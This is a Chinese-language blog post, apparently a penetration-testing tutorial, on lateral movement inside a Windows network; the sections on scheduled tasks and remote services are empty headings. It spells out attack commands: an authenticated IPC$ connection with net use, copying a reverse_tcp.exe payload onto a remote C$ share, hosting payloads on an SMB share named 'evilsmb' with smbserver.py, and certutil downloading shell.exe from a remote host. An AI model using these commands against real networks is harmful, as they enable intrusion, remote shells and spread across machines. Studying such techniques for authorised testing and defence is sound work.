首页 > 其他分享 >内网渗透之横向移动

内网渗透之横向移动

时间:2024-05-26 22:26:19浏览次数:13  
标签:IPC 渗透 主机 横向 远程 服务器 共享 移动 SMB

一、使用文件传输

1.1 网络共享

在网络资源共享中,有admin\(系统目录共享,还有IPC\)共享,是实战中通常建立的共享连接;建立IPC$共享需要以下两个条件:

1.远程主机开启了IPC连接
2.远程主机的139端口和445端口开放

执行以下命令就可以与远程主机建立IPC连接

net use \\10.10.10.19\IPC$ "password" /user:"username"

建立连接之后就可以使用命令了,比如

dir \\10.10.10.19\C$ 列出C盘的目录

将攻击载荷上传到目标主机

copy ./reverse_tcp.exe \\10.10.10.19\C$

1.2 搭建SMB服务器

在自己的服务器或者被控的主机上搭建一个SMB服务器,将攻击载荷放到SMB服务器的共享目录中,并指定UNC路径,让横向移动的目标主机远程加载SMB共享的文件。

在Linux上使用smbserver.py来搭建:

mkdir /root/share
python smbserver.py evilsmb /root/share -smb2support

执行上述命令即可搭建一个名为evilsmb 共享目录指向share的SMb匿名共享。

1.3 通过Windows自带工具

certutil -urlcache -split -f http://ip:port/shell.exe C:\reverse.exe

二、创建计划任务

2.1 常规利用流程

2.2 UNC路径加载执行

三、利用系统服务

3.1 创建远程服务

3.2 SCShell

3.3 UAC Remote Restritions

标签:IPC,渗透,主机,横向,远程,服务器,共享,移动,SMB
From: https://www.cnblogs.com/iruan/p/18214394

相关文章

  • 内网渗透-信息收集-精简详细篇
    一、前言上一篇我们已经讲了在Windows主机里面信息探测的一些命令,但是有很多很杂,这里就把最常用的列在这里就行。二、本机基础信息收集1.查看当前用户、权限。whoami/all2.查看网络配置`ipconfig/all`3.查看主机路由信息routeprint4.查看操作系统信息systeminfo5.......
  • 内网渗透-信息收集
    一、前言对于所有的渗透而言,信息收集是最重要的一步,关系着后续的所有进程。对于内网渗透来说,信息收集主要就是对所拿下的一台主机进行信息探索。这里主要介绍一些常用的命令。二、获得主机的基本信息1.获取主机名hostname{%asset_img1.png%}2.获取系统信息systeminfo3.查......
  • 内网渗透-隧道搭建
    一、前言为什么要进行代理搭建?因为目标主机会把一些可利用的端口给禁了,或者说内网的防火墙不允许这些端口出现,那么这时候就需要搭建一个隧道,什么是隧道,对于小白来说可能有点抽象,其实就是主机与攻击机之间的通讯端口,然后还会设计到端口转发或者是端口映射的问题。端口转发一般发......
  • 内网渗透-Windows常用提权方法
    一、前言将介绍常见的提权方法。从为什么该方法能够提权(原理)到使用方法。二、系统内核漏洞提权1.为什么能提权?内核漏洞通常是指内核溢出漏洞,什么溢出呢?缓冲区溢出。那什么是缓冲区溢出呢?当应用程序或者是内核的驱动程序在接受用户输入的数据的时候,它会把这些数据存储在缓冲区......
  • (读后分享)移动Web前端高效开发实战:HTML 5 + CSS 3 + JavaScript + Webpack + React Nat
    链接:pan.baidu.com/s/1tIHXj9HmIYojAHqje09DTA?pwd=jqso提取码:jqsoHTML5新特性与应用:介绍HTML5的新特性,包括语义化标签、本地存储、设备兼容、连接特性等,并讲解如何在移动Web前端开发中充分利用这些特性提升用户体验。CSS3样式与动画设计:详细讲解CSS3的样式设计和动画效果,包......
  • Unity2d横板移动有个极小的向下的加速度
    2d横板角色移动在碰撞体边缘刚体会有个向下的极小值-1.776357e-15,如果用加速度判断一些东西会出问题,找了好久发现碰撞盒的size的x轴所影响,修改碰撞盒size的x值可以让他不触发,但值不是固定的,不同的碰撞盒有不同的值,本人初学,原因未知,求大佬解答在大概这个边缘的时候地面碰撞盒......
  • 【全开源】教育系统源码(支持微信小程序+移动端H5+安卓APP+IOS-APP)
    构建智慧教育的基石在当今信息化快速发展的时代,教育系统正面临着前所未有的变革。西陆教育系统源码,作为这一变革的先锋力量,以其卓越的性能和灵活性,为教育机构提供了全新的解决方案。一、源码的力量:定制化与可扩展性西陆教育系统源码的核心优势在于其高度的定制化和可扩展......
  • Unity (动画效果 和操控人物移动)
    前沿可以在store上选中自己的模型喜欢然后倒入到你的库中 然后场景中需要设置路线什么的要用到导航 因为天花板是头顶,不是静态的,所以把statc给取消勾选然后windows->>>Ai------>Navigation 点击level模型 然后 点击Bake然后就是烘培了导航 人物移动跟......
  • 红队攻防渗透技术实战流程:云安全之云原生安全:K8s安全etcd Dashboard Configfile漏洞
    红队云攻防实战1.云原生安全-K8s安全-Kubelet漏洞利用1.1K8s安全-Master节点漏洞利用-2379端口etcd未授权访问1.1.1K8s安全-Master节点漏洞利用-etcd未授权的几种利用方式1.1.2K8s安全-Master节点漏洞利用-etcd未授权-V2版本利用1.1.3K8s安全-Master节点漏......
  • 红队攻防渗透技术实战流程:云安全之云原生安全:K8s实战
    红队云攻防实战1.云原生安全-K8s安全-Kubelet漏洞利用1.1K8s安全-横向移动-污点Taint-概念1.2K8s安全-横向移动-污点Taint实战1.2.2K8s安全-横向移动-探针APIServer未授权1.2.2K8s安全-横向移动-利用污点Taint横向移动master节点1.2.3K8s安全-Master节......